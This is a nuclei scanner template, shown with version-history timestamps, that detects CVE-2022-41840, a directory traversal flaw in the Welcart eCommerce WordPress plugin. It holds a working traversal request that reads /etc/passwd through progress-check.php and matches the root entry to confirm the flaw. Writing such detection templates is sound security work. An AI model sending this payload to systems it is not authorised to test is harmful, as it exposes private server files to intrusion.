nuclei-templates/cves/2022/CVE-2022-41840.yaml

37 lines
992 B
YAML
Raw Normal View History

2022-10-22 13:43:27 +00:00
id: CVE-2022-41840
info:
2022-10-22 22:24:28 +00:00
name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
2022-10-22 13:43:27 +00:00
author: theamanrawat
severity: high
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
classification:
cve-id: CVE-2022-41840
metadata:
2022-10-24 13:01:23 +00:00
verified: true
tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
2022-10-22 13:43:27 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
2022-10-22 22:24:28 +00:00
matchers-condition: and
2022-10-22 13:43:27 +00:00
matchers:
- type: regex
2022-10-22 22:24:28 +00:00
part: body
2022-10-22 13:43:27 +00:00
regex:
- "root:.*:0:0:"
2022-10-22 22:24:28 +00:00
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200